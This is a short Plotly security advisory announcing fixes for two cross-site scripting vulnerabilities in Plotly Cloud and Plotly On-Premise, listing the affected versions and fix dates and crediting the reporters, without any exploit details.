Plotly Security Advisory - XSS in Plotly web interface
Summary of issue
Two separate Cross-Site Scripting (XSS) vulnerabilities have been fixed in the Plotly web interface.
By tricking an unsuspecting user into following a specially crafted link to Plotly Cloud, an attacker could perform any action any action using the victim’s credentials on that site.
An attacker could trick an unsuspecting user into viewing a specially crafted dashboard on Plotly Cloud or a Plotly On-Premise server. The vulnerability would have allowed the attacker to perform any action using the victim’s credentials on that site.
Thanks to Nassim Bouali and Mahmoud G. for reporting these issues.
Affected products and versions
- Plotly Cloud was vulnerable to both issues prior to 2016-11-04.
- Plotly On-Premise version 2.0.0 is vulnerable to the second issue.
- Both issues were fixed in Plotly Cloud on 2016-11-04.
- The second issue issue has been fixed in Plotly On-Premise version 2.0.1, which is available as a free upgrade to all current Plotly On-Premise customers. (The first issue has never affected Plotly On-Premise.)
General notes regarding security reporting
Please send all security reports concerning Plotly security products to email@example.com.
Return to the main Plotly Security Advisories page